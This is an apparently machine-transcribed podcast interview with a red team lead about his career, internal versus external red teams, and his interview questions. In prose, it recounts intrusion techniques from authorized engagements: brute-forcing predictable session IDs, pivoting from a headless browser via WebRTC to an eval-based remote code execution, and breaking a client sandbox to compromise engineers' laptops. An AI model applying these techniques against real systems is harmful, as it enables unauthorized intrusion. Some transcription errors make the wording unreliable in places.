16. Will Butler, Red Team at Robinhood and Co-Founder of TruffleSecurity, From Hacking Airports to Leading Red Teams

Welcome, everyone, to the Security Podcast of Silicon Valley. I'm here today with a very special guest, Will Butler. Good to have you on the show. Thanks so much for having me, John.

So Will brings with him a great deal of security experience, and I would love to go through just a quick summary. He got into security first by hacking airport physical security systems at the age of 15. He has degrees in economics and finance. Oh, and philosophy, because he figured he could teach himself security but wanted to start his own company someday.

He started actually as a red team consultant at PwC, a wide variety of companies in terms of industry size, maturity. Then he moved over to Apple, where he was on the AppSec team for service products like Apple Music, iCloud, Apple Pay, Siri. I think your Siri might have heard that. I think so.

That's so funny. Siri, go away. That happens to me all the time. Yeah, that does.

No, I was on the iTunes security team and the DRM team. So maybe we need to look at that. I'm sure you'll have some good stories. I bet we overlap.

I was underneath that crazy Frenchman, Augustine Farugia. I know exactly who you're talking about. Really? Yeah, okay.

So they kept us like tucked away in the back corner and wouldn't let us talk to anyone else. But I knew other people existed. They must have been doing some of the good stuff over there too. So anyway, after your with Apple, you moved into management.

You started a small red team focusing on the same areas. You started the red team at Cruise, the self-driving car company here in San Francisco. Looks like you grew that team from zero people up to eight people. You hired some illustrious folks like Mubix and.

. . Carnal Onage. That's my boss here, Chris Gates.

Onage. That's an amazing team. That's a scandal. I love it too.

So you were doing some red teaming for Cruise. And next you decided that you do really enjoy the foyer into people management. You're going to likely do it again, but your real passion was actually technical work. And that you were just not done learning.

And so you moved to BitMEX, the largest Bitcoin exchange in the world. You were a staff red teamer. That was also a hugely learning experience because it was a small company facing very real stakes and probably some very interesting adversaries. And then you followed your manager from BitMEX, it was Chris Gates, over to Robinhood, where you are the red team tech lead.

And at Robinhood, you do things like designing your assessments, delivering red team presentations, using your perspectives to influence the security roadmap where it makes sense. Yeah, that's good. And you also are the co-founder of Truffle Security. And Dylan, he was actually on a previous podcast here on the Security Podcast of the Silicon Valley.

Gotcha. Gotcha both. Are there any other co-founders on Truffle Security that we should have on the podcast? There are a few, yes.

There's Dustin Decker and Julian Dunning, both extremely interesting. I'm sure that you'd have a great time talking to them. Amazing. We'll have to pull them into the podcast as well.

And so it looks like at Truffle Security, you're taking an open source product, TruffleHog, and you're building out sort of an internal secret scanner that you've seen a lot of people struggle with. So instead of watching them struggle, you're offering an enterprise SaaS solution, I would imagine, to help exactly drop in and get folks up and running. Hey, thank you so much for joining. No, thank you for having me.

Okay, so maybe you'd like to share that initial story with all of our listeners of how did you get into security? Yeah, absolutely. Yeah, this is the story I always like to tell people. So I got into security pretty young.

I was a mischievous little kid and I went to a Montessori school with a kind of like basic computers class where they taught you how to make a web page in HTML and JavaScript and things like that. I gravitated towards security because I loved messing with the kids in my school and had read a lot of the hacker lore. And so I naturally gravitated towards that. So then at one point, I was 15, I wanted to get a summer job and I found a job at the local airport cutting grass.

But so my very first day, they were sending me to training on how not to get run over by airplanes when cutting the grass at an airport, which is, you know, good training. That's important. That sounds very important. Yeah, so then right in the middle of the training, it breaks and it's some like old Adobe Captivate presentation.

I thought I could fix it, so I tried and it worked. And they were like, oh, computer things. You should be an intern in our IT department. We need people.

So I ended up being an internal summer at their IT department. And one day I was looking into a bug for a coworker when I came across this system on our network. And I started looking at the web application and. .

. I noticed that it was returning a very suspiciously small session ID cookie. It was just a number, and it was about three orders of magnitude. And so you're thinking like, huh, that's suspiciously low.

I wonder what happens when I log out and log back in. And it had only incremented by five. So I'm thinking, okay, I know how this algorithm works. So I wrote a quick little script to just try thousands of session IDs and see what happened.

Turns out I landed on an administrator session, and I could control almost everything in this application. So I decided to look around and figure out what this application did. It turns out that it controlled almost all physical security at the airport, everything from the hand readers to the door locks to the cameras. And so at that point, I go to my boss, and I'm like, oh, this is bad.

We should look into this. And he tells me something interesting, which is that the airport actually didn't write this, as I thought they did. It was some independent contractor, and this software is deployed at many airports all throughout the country. And he also tells me that for maintenance reasons, this software is actually facing the internet as well.

And it is in the underlying model. Wow. Yeah, it's no good. So then we report it up to the head of our local little port authority that runs the airport.

And he tells me that it turns out Obama's flying into this airport in two weeks, so the Secret Service is out conducting a security assessment of the airport and heard about it. So we ended up getting on the phone with the contractor, getting it patched, and they hired me to review some of their software after that. So then that's kind of like how I got into the consulting side of things. And I did end up going to college, but I figured, like you said, that I could maybe teach myself security and computer science, but it would be more difficult to teach myself the principles of economics, finance, and accounting, and things like that.

And I always wanted to start my own business someday, so I thought it would be good to take this opportunity to learn something that I might not otherwise be able to in college. And so we'll see how that works out for me, because I don't actually have a CS degree, and I do occasionally feel that pain. But I'm glad that I ended up with those degrees because they've definitely been useful on the business side of things. Oh, I could imagine that complements all of your, all of the technical skills, the technical low power.

So if you have the drive to go off and dig into those technical pieces, that sounds like a perfectly good use of your time in college. So you also listed philosophy as an interest, a point of interest. I also love philosophy. Do you have a favorite philosopher?

Oh, so I like the Greeks. I read a lot of the ancient Greek philosophers. I got to say I'm relatively out of practice. I have not read a lot of philosophy lately, but it was something that I was always interested in at the time.

And so I figured I should just write a few papers and take the classes. It wouldn't be that much more work than I'd otherwise be doing. But I found it rewarding because I forget who said this, but someone's smarter than me. There's a quote I like that's philosophy is the science of thinking clearly.

And I really think it's helped up my rigor quite a lot. Yeah, I get that 100%. I really enjoyed it. I have to say, like understanding where meaning comes from or morality in some sense.

And I suppose being a red team expert, it changes your relationship to power, right? You can make these systems do pretty much anything with enough time and energy and focus. So having a strong moral compass, I'm sure, is part of the territory in your line of work, specifically in a red teamer. Yeah, I think that's a really good point.

I think that my degrees have interesting security applications that haven't always been obvious to me and certainly weren't at the time. Understanding economics and its effects on attacker incentives, or like you said, moral philosophy and how we navigate our careers and things like that. Yeah, it's very interesting. Or finance to really understand the business impact of some of the vulnerabilities that we find.

Exactly. Sometimes something can feel very scary from a security point of view, but then when you look at it from a business point of view, you're like, well, it doesn't impact our core business. And so is that really worthwhile to spend all of these resources to get us to that 100% mark or is that an accepted risk for the business? Yeah, and similarly, the incentives that attackers face.

Exactly. So some of the attackers, they're making the same economic choices as the businesses. That's a really interesting perspective. I've never flipped that before.

Yeah, and something I love doing is listening to stories about leaks from various threat actors, like their chat logs or something, and learn how much they actually function like your average developer team. They have SREs and they have Sweets. They have PMs, and it's very. .

. Oh, they have PMs? What sort of things do they PM? Like product managers?

Yeah, I guess. You know what? I admittedly haven't looked into this a ton, but I listen to the Risky Business podcast a lot. They're constantly talking about how similar some of these crews are to your average security or software engineering team, and it's fascinating.

I imagine. That's a really interesting perspective. I hadn't thought of them as full-functioning teams before. Sometimes it's just easier to think of them as that nebulous, faceless adversary out there, but they're not.

They're human beings just like the rest of us, and they operate, I'm sure, pretty well in small teams of high trust, and they move quickly together, just like everyone else. Yeah, and interestingly, that can make attribution difficult to one crew might be like the malware developer for several other crews that actually run a campaign, or there might be one that tends to get initial access and then another one that uses that initial access. And so it can make attribution kind of tricky. Yeah, I could imagine.

So if you think about your entire career as a red team member and as a leader and even as a team builder at crews, would you care to pick out like a very best day that you've ever had through your entire journey? Oh, man. So I have a lot of good days, to be honest with you. I really enjoy my job.

Some of the ones that come to mind first, I really love days when I, as a red teamer, can influence significant amounts of change in an organization. And I think that there have been several at recent companies that I'm going to combine almost into one story, so I'm not revealing too much about any of them. But basically, sometimes we'll do assessments and we give readouts and they don't go anywhere because our findings are really inconvenient. We tend to find vulnerabilities at the boundaries between different systems and abstractions and things that are fundamentally insecure by design.

And so they're not something you can just hand a team and say, go change this configuration setting or patch this software or encode this output as it goes out onto an HTML page in your browser. What we find tends to be, hey, your CI system is insecure by design, and you need to make some major changes to it that are likely to break many other teams' workflows. And so it's pretty easy, I think, to get discouraged when you have findings like that and companies don't want to fix them.

But occasionally, we've been a part of assessments that have really influenced change significantly, where we will be impetus behind these very large-scale tiger teams that can actually make significant breaking changes across the organization. And I think that we've convinced organizations that it's worth investing the time to fix these things properly. And seeing that is extremely exciting and motivating, and you feel like your work has a lot of value. So those are some of the best days that I've had, is seeing stuff really fixed, like breaking changes rolled out, core infrastructure changed, and people really being happy with the attack surface reduction as a result of the work.

No, that sounds really meaningful. Like just totally fulfilling to be part of something bigger and larger than just, you know, our day-to-day grind. Yeah. And then, of course, the other best days are when you find cool bugs.

There's just, there's no feeling quite like that. It's a real rush. One of the best days that I can remember is when I found this bug. It's probably my favorite bug, so if you don't mind, I'll give you a really quick deal about it.

I will, I will look to hear about your favorite bug. Okay, so this is my favorite bug that I found, not my favorite bug ever. I've definitely, people have found way better bugs than this, but this is. .

. Your favorite bug that you have discovered. It's the favorite bug that I've discovered. So one time I was registering new phishing domains for a red team exercise with a client.

And I noticed that approximately every hour on the hour after we registered these domains, we would get a very specific set of HTTP requests from some odd user agents. So like outdated Chrome, like way outdated Chrome, or like an outdated Python requests user agent or something like that. This was actually before the engagement started, so we reached out and tried to figure out what this was at the client. And it turns out they had a very cool piece of software that would ingest domains, try to figure out.

. . which ones were sufficiently similar to domains that the company owned, and then see if the pages were sufficiently similar to any of the company's pages, and if so, they could get ahead of them, which I thought was awesome. I'm like, that is a really cool piece of technology to have.

And I was thinking, though, if you're rendering attacker-controlled JavaScript, that's the interesting bit of attack surface for me. I'm wondering if there's anything I can do with that. So we ended up sending back a payload that used the WebRTC API to get the local IP addresses of network interfaces on this instance running the headless browser. And we then pushed another bit of JavaScript that did a little bit of screenshotting of various HTTP services that were running on that local slash 24.

And we found a very interesting application. It was a simple dashboard application that was just displaying data from a database. It appeared static, didn't really have much functionality other than you could just click a couple buttons and it would show different stats. But I looked into it because it turned out it was a vendor product, and I looked into this a little more.

And the way that it works is hilarious. So the query string of the URL was just the name of the database table that it was showing the statistics about. Like, it wasn't a query parameter. It was literally just the name of the table.

And the way it worked is literally, it evaluates the string in an esoteric programming language. I won't get into the language because it might tell you too much about this, but it's a very weird esoteric programming language. And functionally, it's just calling eval on your query string. That's even worse.

Even worse. I love this, but way more esoteric than Lisp. And so it's calling eval on your query string. So this is perfect.

It's literally an RCE that's triggerable from a simple Git request. So I can use this JavaScript that I'm writing in the headless browser to trigger the RCE. So I'm super pumped about this at this point. And I look into this language.

I learn it enough that I can write a payload. And I get code running on this host. But it turns out it's not that useful because the host that I'm running on has very little access to anything. It doesn't have a whole lot of network access.

It has very low Kubernetes service count. It can't talk to the NVS metadata API. It's connecting to some read replica of a non-prod database that nobody cares about, has no interesting data in it. So it's not like even that database connection is really valuable.

So I'm thinking, oh, man, was all that just to compromise this silly little unprivileged host? But then I started looking more into this product. And it turns out that the way this product does async is very odd. It allows a database client to basically specify the name of a stored procedure that the server can call on the client when the results are ready.

And so I'm thinking, oh, that's fascinating. So can I just call arbitrary code in this client? Not quite. There is actually a sandbox that this technology uses to make sure that you can't just call arbitrary code in the client.

But I found a way to break out of this sandbox. And so now you actually could execute arbitrary code from the server to the client. So I looked at what clients were connected to this database. Turns out, like, every engineer working on this database in production is connected to the test database.

So I was able to exploit their laptops with this sandbox breakout. And then a few iterations later, it compromised most hosts in this network at the client. And it was all just from this JavaScript payload in a headless browser. Wow, so I think that was.

. . That's like tugging on the little thread at the end of the sweater and the whole thing came unraveling before your very eyes. So how long did that take to go from, like, when you first noticed to all the way to all of those compromised hosts?

It was on the order of a few days. Now, to be honest with you, we did cheat a bit. At this point, we were already talking to the client. They were fairly engaged with their security team.

And so we did just ask them what this technology was. I didn't actually spend the time to, like, fingerprint it and reverse it to figure out what it was. We just asked them. It took two days instead of three days.

Yeah, so it was on the order of a few days, but we did have a little bit of help from the client's team. No, that's great. Just finding those little pieces. I think of red teaming as almost more of an art than a science because you have to have these intuitions and you notice something kind of flicker at the peripheral vision of that just normal engineer.

Just like, oh, don't worry about that. That's just an edge case. But, like, you go down, you go all the way down those edge case paths. You just want to see what's there.

See what's there. I completely agree. I agree with you. Yeah, I think that the old Paul Graham essays about hackers and painters come to mind there, where he's talking about how hackers tend to be more like painters than they are like engineers.

When he says hackers, he means makers, creators, and not necessarily security people. But I actually think a lot of his arguments can extend to offensive security engineers. There's a lot of element of creativity, and there's almost a weird amount of lack of formal understanding of reasoning about exploits and what will move that actually work that's to be done. That's part of your strength, because you don't bring with you all of these preconceptions about how a system is working.

You have to discover it for yourself. And so when you go down that road of discovery, you are actually looking at the real bits and pieces that are not what they should be, but what they are. And there's a difference, and that's what you exploit, right? That is such a good point.

I actually want to talk about that point for a second. So that's something that I really try to impress upon people, is that one of the bits of value that a red team can provide is that security teams and engineering teams too, they often talk about their systems the way that they think they should be, or the way that the documentation says it should be, or the way someone told them it should be. But they haven't actually gone through and operated on those systems. And so there's a lot of like little subtle differences between what the documentation says or what somebody tells you and what's actually going on.

And one of the value that red teams provide is understanding that ground truth and giving your teams a tether to reality almost. And I have a good story about this. One of the places that I was working, I happened to be good friends with their head of infrastructure. And we were out having beers one night and I was going over an idea that I had for an attack chain.

And about two thirds of the way through, he stops me and says, I actually don't think that's going to work because at that point, you'll have to SSH into this box and we have SSHCA configured on all those boxes. And in order to get a certificate, you have to have second factor off. And you at that point in the attack chain wouldn't have any access to somebody's MFA. And I thought about that for a second and it was like, okay, yeah, I guess that would be a big obstacle, but like any diligent red teamer, I'm going to try anyway.

Of course. So I try anyway and it works. And it's not because he was wrong. SSHCA was actually deployed on most systems, but it turns out that there were a few that it wasn't deployed on because some systems the team didn't know about, so they didn't deploy SSHCA over there and it was still accepted passwords and keys.

Other systems, they deployed it, but it broke stuff. There was some automation that was using it. And so they rolled it back and then they never redeployed it. And then there was a third set of systems that did accept SSHCA, but also accepted other forms of SSH authentication.

And so I think that kind of real ground truth understanding is very valuable. And there aren't a whole lot of teams that are paid to go around and find that kind of stuff. I would call that operational rigor. Like you're, you are so well grounded into what's actually happening that you are just forced to see all of the exception cases.

It just turns out that those exceptions lead to some pretty interesting security situations, huh? Yeah, absolutely. I think it's definitely that kind of stuff that is going to get you popped. So if you think of your entire career as a red teamer again, but this time instead of thinking through your best days, could you share with us maybe any of your worst days?

Good question. So one type of worst day is when you cause production issues. So red teams inherently have to do some risky things. You're generally manipulating systems that maybe you don't understand as thoroughly as you should.

And sometimes those systems are serving production traffic. And as much as we try to have lots of processes and technology in place to mitigate risk, occasionally something will slip through and it'll cause an outage. And so sometimes I've been on teams where this kind of thing has happened. Luckily, our outages have been very well controlled because as an internal red team, we tend to work very closely with the other engineering teams.

And so we're able to get on top of these issues when they come up. But for example, Remember that database story that I was telling you earlier? Oh, yeah. So there was a weird situation that happened with that where the runtime with this database was single-threaded, and they, it's like the JavaScript runtimes, except instead of being asynchronous by default, it's actually synchronous by default, and you can specify that it's asynchronous if you want.

But so the script that I wrote to enumerate all of the connected clients and then exploit them was synchronous, and because it was running, that means that nothing else could actually make progress at that time. And so now luckily, as I said before, this was a test system. It wasn't serving production traffic, but those are the kinds of subtle gotchas that you can run into where I didn't realize, but I was actually preventing all other traffic on that system from making progress because I didn't quite as thoroughly understand how the runtime worked as I thought I did. And you can run into these situations a lot.

So we do, we do actually go to great lengths to mitigate risk. I'm probably one of the most cautious red teamers you'll talk to, but I really try to think about that a lot and make sure we thoroughly understand what we're doing before we do it. No, that sounds like a very responsible approach to red teaming. But we, boy, I'll tell you, it gets your blood pressure up sometimes, you know, you're exploiting something and all of a sudden the connection starts hanging and you're weird stuff or Sev pops up and says, I could imagine, I guess that the denial of services is just too easy to pull off and call like a red team success.

It's especially when you're in a production system. Yeah, absolutely. And we've worked with some really fragile systems where you're absolutely right. They were under such heavy load or in such odd configurations that it didn't take a whole lot to cause problems.

But yeah, we really try to make sure that we limit the risk as much as we can, even if that means, by the way, taking another path. I can't tell you how often I've had my teams do that, where we have a promising looking exploit or a promising lateral movement opportunity. And I say, no, let's look for something else, even if that means backtracking a bit because that's too risky. No, that's really interesting.

And this gets into the operational like day-to-day grind of a red team. Do you guys often work together on the same project, on the same system, and everyone takes a piece and goes off and investigates or recons and then regroups? Yeah, that's a really good question. I've seen it work different ways, but the way that I like to do it generally is we will meet and get to, and so we'll meet initially and we'll come up with our list of kind of research tasks, like the initial recon, for example.

Now then we'll split up and have each of us some recon tasks assigned, and then we'll work through them. And when we think we are at a point where we can make enough transitions that we're ready to actually run them, we actually get together and do that stuff live together. So if we're remote, we'll all hop in a Zoom, or if we're in person, we'll all go into a conference room and we'll do that together. Then there's also points at which research overlaps or somebody's expertise is required for a research that another operator is doing.

And a lot of times they'll collaborate independently of the rest of the team, seek advice as necessary. But yeah, that's usually how it works is we get together and we execute. Then once we're at a good stopping point and we don't know what to do next, we divide up research tasks and then work independently. Repeat, repeat, repeat until the objective is accomplished.

Nice. Yeah, no, that sounds like good feedback loops and a good amount of independent time versus also working together so that everyone's differences can be brought to the table and shared. And I'm sure that creativity, like in an open and welcoming environment, can really get going in those small groups. Yeah, absolutely.

And even when we're working independently on our own tasks, like we're usually posting updates in Slack and folks are collaborating there. It's so there's still plenty of collaboration that happens, but we're usually exploring our own tasks, mostly independently doing things like vault research or recon and or things like that. Yeah. And the other thing that you mentioned too, that I'm sure maybe some of our listeners caught is that you're describing this from the perspective of an internal red team, which is really distinct from an external red team, or sometimes referred to as contracted pen testers.

Yes. And so what are the differences that you get? What are the advantages and I guess disadvantages too of being an internal red team versus just a one-time shot external pen tester? That is a great question.

There are a lot of differences and I think it affects how you use the team. And I think a lot of people don't understand the differences. And so they They will try to manage one as if it's the other and then be disappointed in the results. And I feel like if you just tweaked your use of the team slightly, you could have gotten infinitely better results.

So I'll delve into a few of the differences and how I think they affect how you use the team. So the first difference is that an external red team is going to be much closer to the real adversary in terms of their knowledge of your environment. And specifically, they're going to be facing similar constraints that a real adversary. They have a time box.

They have very little knowledge about what your company is like from a security perspective. They don't know what controls are in place. They don't know what projects are currently in the works. They don't know what technology you're using.

And they have to figure all that stuff out themselves. So the internal red team, they're generally just going to know this stuff. And I know some internal red teams try to be more like an independent red team, but I think that is not probably the best way to use an internal red team. I think an internal red team should actually be fairly well integrated with the rest of the security team.

They should work very closely with everybody else. They should get an idea of what the capabilities of the DNR team are, for example. They should get an idea of where the common vulnerabilities are. Now, a disadvantage of that.

. . You can actually make your future life a little bit more challenging. Absolutely.

As a red team, as an internal red team. Yeah, so I think that's the eternal conflict, is how independent should your team be? Personally, I've had the greatest success when my internal red teams were not independent at all. They were very tightly integrated with the rest of the security team.

And I think that actually enables them to act almost like a security product managers too, which could be a really interesting, unusual role for an internal red team, but one that I've seen work really well. Just as your typical product org has product managers that are supposed to help your team decide what to build, like what features to build. And the engineering team is supposed to decide how to build it. I think security is in a similar position where your security engineering disciplines, like Infosec or AppSec, they are the ones, or like detection platform, for example, they're the ones who understand how to build things.

They're the ones who know how to build scalable log ingestion pipelines and like, they'll be the ones who understand how to fix vulnerabilities across your whole code base and design secure by default infrastructure and stuff like that. But they might not necessarily be the ones who know the most about what security controls, if in place, would make a real attacker's life most miserable. And I think that that is what red teams and maybe also like threat intel folks are most qualified to opine on. And so I think that red teams can actually be really useful from that perspective and be like pseudo product managers.

And that's something that I think is much easier to do when you're an internal red team and very closely integrated with the rest of the security team. Oh, I imagine. Yeah, for sure. For sure.

I guess from my own experience is one of the things that I've also seen external red teams, I don't know why this falls on more external red teams, but those reports that they produce, sometimes you could ask or even contract out an external facing like customer visible summary of a report. And then they'll come in, they'll do like an initial assessment. You go through a couple of engineering cycles, fix a whole bunch of the criticals and the highs, and then come back with another assessment and show the delta that things are moving in the right direction.

And then at least in B2B plays, where it's a large business selling to another large business, maybe it's an enterprise deal or a large company, you show. . . These customers, these security teams that the sales teams are bumping into that are asking the tough questions around, hey, is this product really secure?

Do you have any internal pen test reports that you can share with us? You can hand them these reports and break down the sales barriers that sort of show up in the B2B play. I'm actually really glad you brought up reports too, because I think that's another really critical difference between an internal and an external red team. So an internal red team has lots of different options for how they add value after the assessment.

An external red team usually only has one, which is the report. An internal red team can do everything from submitting a patch for the bug themselves or writing a rule that they wish existed or sitting in on an architecture meeting and providing an opinion. And so I think that gives them all sorts of additional opportunities for having a lot of an impact. But then also, another thing that I think is so interesting about the internal-external dynamic is that I never understood how useless my own recommendations were as a consultant until I started being on an internal security team.

When I went from consulting over to Apple, I was originally in the AppSec team. And so I would get some consulting reports and have to do things with them. And I was just thinking, these, I don't expect the consultants to understand our internal context, but because they don't, their recommendations tend to be way overly generic and not useful to us. So I remember one of my first days actually at Apple, we got some report and I sat down with the team and I pulled out my typical consulting person explanation for how they should remediate it.

And they were like, oh, yeah, we've already thought of that, but there are 16 different weird edge cases and limitations and restrictions that make all of those solutions completely impractical. Now help us. And I'm like, oh, no. That made me really significantly up my security game quickly because I had to really sit down and understand the context restrictions that these teams are operating under and design them a solution that mitigated enough.

And so I think that really taught me a lot about the engineering economics of phones and fixes. And I feel like external teams miss a lot of that stuff. They do miss that. Yeah.

But I don't fault them for it. They're under constraints. They just don't have the context. Right.

Their time constraints. Right. Yeah. They're under a lot of constraints themselves that make it super difficult to get this kind of context.

And so I'm not blaming them at all. I don't know about having this context. This is a safe space for not blaming. It's for just understanding the different positions that folks are put in.

Have you ever been in a situation where you've seen assessments coming in from both external red teams and internal? Like on the same systems? On the same systems. I sure have.

Yeah. And I will say internal teams tend to, they tend to find more stuff, but it's because they have an undeniable significant advantage of understanding the tech stack and having a lot of familiarity with the teams and environments and stuff like that. So I've definitely seen both sides of it. But the other thing though, is the internal teams reports tend to be a lot lighter because they know that they're probably just going to end up in a meeting with these teams explaining it anyway.

And a lot of that's going to go into vault tickets and a lot of that's going to go into pull requests and things. So I actually find the external teams reports tend to be of significantly higher quality. Oh, okay. If that's your only venue of communication, I suppose they have to put whatever they got in there.

And that's the reputation, their name goes on it. Yeah. And another thing too about external teams is that they often are able to hire subject matter experts that it doesn't make any sense for you to hire. So you might not have enough time or I'm sorry, you might not have enough headcount for some full-time cryptocurrency expert on your red team, but Trail of Bits does.

And they can sell that expert's time to all sort of other clients who need it. And so they are able to get some really deep subject matter experts looking at a system that your red team who has to be comprised of more generalists can't. So I actually think a lot of times it's really useful to have both look at it because they both have their pros and cons. The external ones, less biased.

They probably have deeper subject matter experts that they can go rely on for different things. And the internal team has more context and knowledge. So I think that having both look at the same systems is actually really valuable. I remember we actually worked with an external red team in a company that I was at and we both operated on the assessment together.

So we had So night operators in a few bars and we went after together and that's super cool. Oh, that's amazing. Yeah, I could imagine that also an extra red team would be a good option for folks that know that they're at a point where they need a little bit of help. They want that second pair of eyes on their system that is really bringing out security perspective to the table, but they're just the company's not big enough or whatever to have an all-out red team in-house already.

And that's an interesting question, even for startups in general, if you're in a regulated space, when is the right time to do your first assessment? Yeah. Is that when you ground V and you close your first big customer? I don't know.

That's a really good question because the economic constraints of startups are really interesting. And so I can't imagine many of many early startups hiring a red team, but I must say hiring a red team early, even if it's just a single person or even if it's a person that doesn't red team full-time, but has that background, can be really useful for that product management perspective that I was talking about before and kind of the ground truth perspective.

Like having a red teamer help design some of your initial infrastructure and things like that, I think will pay enormous dividends over time because a lot of times we're invited in, understandably, but when there's so much momentum built up behind the current infrastructure that it's really difficult to change things, like I mentioned before. And if you get a red teamer in who's comfortable being more of a product manager and not red teaming all the time, I think they can provide immensely valuable perspective that will pay for itself a lot later. Amazing. No, that's really good advice.

Great perspective. So speaking of bringing on red team members, do you have a favorite interview question? Oh, yeah. Okay, so my favorite interview question is actually a hypothetical that I like to give.

So if I'm interviewing for an off-sec position, the question that I always ask that takes up most of the time is just a hypothetical. And it's, say I hire you and your first assignment is to recover private Bitcoin wallet seed key or something like that, some individual's file of immense value. Now, obviously, that's not how it works, but like, you know, assume it is. Sure, just a fun start with.

Yeah, and you start with no access and you start with no internal knowledge. And to make it easier, yeah, you can assume that a key value is just a single file, a single EC2 instance. Now, I ask them, walk me through how you'd approach this problem to begin with. So it's pretty vague right now, and I'm hoping that they're going to do things to try to make that one more concrete.

So they would say, like, all right, I'm going to start by doing some recon and figuring out things like, do they own any IP space? Do they, what domains do they use for their infrastructure? What subdomains of those domains exist? Where do they point?

Is it to some cloud infrastructure? So what is it? Things like that. Like, do they use S3 buckets?

Is there registrar route 53, stuff like that. And then I give them assumptions to work with to narrow it down a little bit. So I'll say, all right, assume your dummy recon returned X, or assume that your port scanning returned the following set of host ports, stuff like that. And then we go through the hypothetical.

And then what I try to do is, as the candidate brings up various technical topics, I like to drill down into those topics as far as I can to see where the candidate's knowledge stops, or my knowledge stops, actually. That happens all the time, and that's great. I love it because I don't have any feeling because then you're learning in the interview yourself too, right? Yes, I love learning in the interview.

It happens all the time. And I feel like either way, regardless of who stops first, I understand where your minimum level of depth is. You know what I'm saying? Like, you can go deeper than me, maybe, but I know where the minimum is.

And if I can go deeper than you, I still understand where the minimum maximum is. That's very useful information to me. And the reason I like this is because it feels a lot less like technical trivia than just asking them these questions because the candidate is almost entirely in control of the technical topics that we discuss. I just try to discuss it in a decent amount of depth.

So an example of me diving deeper is I would say, like, if a candidate told me that they would look for a specific type of vault, like a command injection vulnerability, I would stop them and I would say, okay, explain to me a command injection vulnerability as if I'm the developer who wrote it. How would you do that? And then I would ask them questions like, what's the root cause of that vulnerability? How would I, as a developer, fix that vulnerability?

How would you discover this vulnerability in a very large collection of applications with a lot of functionality? Say you were trying to exploit it and the application returned all these different error conditions. It's how would you try to troubleshoot it and get the exploit working? But let's see that you were trying to exploit it, but you couldn't see the results of your commands.

How would you get the results or how would you try to infer them? What if egress was heavily restricted? How would you infer your, you know, or get your results then? And then how would you fix it, assuming different weird like constraints?

What if you had to fix it, but the application still had to start a subprocess with a single binary with attacker-controlled arguments? How could you do that safely or things like that? And so I try to dig into a lot of depth with each technical topic that Canada brings up. And I feel like that gives me a really good understanding of both their breadth, depth, and areas of focus based on the stuff that they bring up.

No, that sounds like a really enjoyable interview. And it also sounds like the signal that you're going after, it cuts right to the heart of that creativity that we were talking about earlier, where there's a little bit more of an art to this than a prescribed science. And part of that really is not being afraid to do a depth-first search down these little, what do you call them, the little glimmers of odd behaviors found with the different versions of systems that all mean well. Like this software is all stuff that a human being has wrote that's well-intentioned.

Here's what we want this thing to do. Here's how it works. Here's how it's presented to the world. But we're human, and so there are bugs, and there's mistakes.

And that's okay to notice them, to notice those little flickers. Let's call them flickers. These little flickers across the system. It really takes a keen eye and attention to detail and patience with yourself as you dig deeper.

And as you were describing that and the signal that you look for inside the interviews, it almost got me thinking, that's really the signal that you're looking for is that creativity. And that's spectacular. There is a book. Here, let me look it up real quick.

It is called Seeing What Others Don't. It's on my list, but I haven't read it. Oh, this is on your list? I highly recommend it.

You're going to love it. It is by Gary Klein. I'll just plug it real quick. It's by Gary Klein.

It's called Seeing What Others Don't and the Remarkable Ways That We Gain Insight. And what this guy does is he takes a huge case study of all of these really great instances of creativity that have bubbled up over the years. And he just looks into the context where the creativity came from, and he organizes it into this really elegant sort of situation where there's three primary ways that folks, the context of being creative. One of them is noticing a contradiction.

We think the world is X, but really you notice something that indicates that and then you dig into why. Like, why is it not what everyone is saying it is? That's one form of creativity. But there's another one, which really resonates with how I think that interview flows, and that is constrained-based creativity.

So when you constrain a system, problems get more and more specific. And with the constraints introduced to a system, like you have to think different. And oftentimes, one of those constraints is the time vector. And so one of the situations that he highlights in the book is there's these firefighters, they're fighting a fire, and the winds shift.

And all of a sudden, the fire is now chasing up after these firefighters out in the middle of nowhere. It's actually out here in California. And they've realized, these firefighters realized, they could not outrun this wildfire that was rushing up a hill because the winds had changed to work against them. They were either going to die in this fire, or they were going to somehow have a moment of ingenious insight and creativity to save themselves.

And so one of them realized that they're not going to, the leader actually realized, like, oh, we're not going to make it. We need to protect ourselves. And the best way to protect themselves from this raging fire was to actually start a fire. Oh, right.

And to protect themselves from the fire, because if it's already birds, like, it's not going to get birds again. And so you'd have a little space where you would not get burned. So that's what they did. And they were saved.

But it's that constraint of time and your life is on the line. And there are certain things at stake, and you've got to find a creative path forward. And maybe it's the type of stress that you've experienced yourself in a red team where there's a time constraint to how long you're willing or how long you have to look at something along with, like, other constraints in the system that are defined by the parameters of the system that results in some really interesting creative things happening. Absolutely.

I have another interview question that I actually love to ask around constraints like that, which is flip the hypothetical on the defender side. Let's like take a typical vulnerability that you might see and add a bunch of constraints to it and see how you solve the problem. So the one I like to ask is, let's say that you're given an executable from a vendor and through some back channel that it's a very insecure executable, has all sorts of vulnerabilities in it, but you have to run it for business reasons. You can't reverse it or change it for legal reasons.

And so how do you run it as securely as you can? And the other constraint is it has to accept, maybe not directly, but it has to accept some attack-controlled input across the internet. And so I feel like most security people, they focus a lot on the vulnerabilities and less on the other layers of defense. And so I really like to impose that constraint on, you can't fix this.

It's just going to be vulnerable. So now what do you do about that? I am in love with this question. So that's super interesting.

I bet you hear all sorts of stuff. Oh yeah. All sorts of interesting answers to that question. And another thing, speaking of constraints, it's not an interview question, but just something I wanted to bring up is that we, that's actually something that I learned a lot back at Bitnex, which is we were a relatively small team where we have really high stakes and real adversaries.

And those constraints forced us to be very creative. And I learned so much. I would really recommend if anybody's looking to significantly up their learning, go to a place like that. Go to a place with high stakes, constraints, and real adversaries, and you will be forced to learn a lot.

Amazing. I love being pushed outside my comfort zone. That's the only place you do any learning or growing that's worthwhile. I think that's one of the best reasons to do a startup, to join a startup, to do a startup, to build something, to push yourself outside your comfort zone, is just you're going to learn and you're going to grow.

If nothing else, you're going to come out the other side, like a lunch improved. I cry every more. This has been spectacular. I really enjoyed our conversation.

Would you like to leave our audience with any words of wisdom, parting words of wisdom? Ooh, any words of wisdom? Okay. First word of wisdom is red teams can make really interesting PMs.

I know we've talked about this a lot, but it's a somewhat unusual role. And I think there should be a lot more of it. So if any of you are interested in experimenting with that, I would highly encourage it. Second word of wisdom is that there are many layers of defenses that you can put in place between an attacker exploiting a vulnerability and an attacker accomplishing their goal.

And if you really want to make our lives miserable, exploit free one of those opportunities. The engagement doesn't end with the vulnerability. It ends when they accomplish their goal. So I would encourage folks to focus on that.

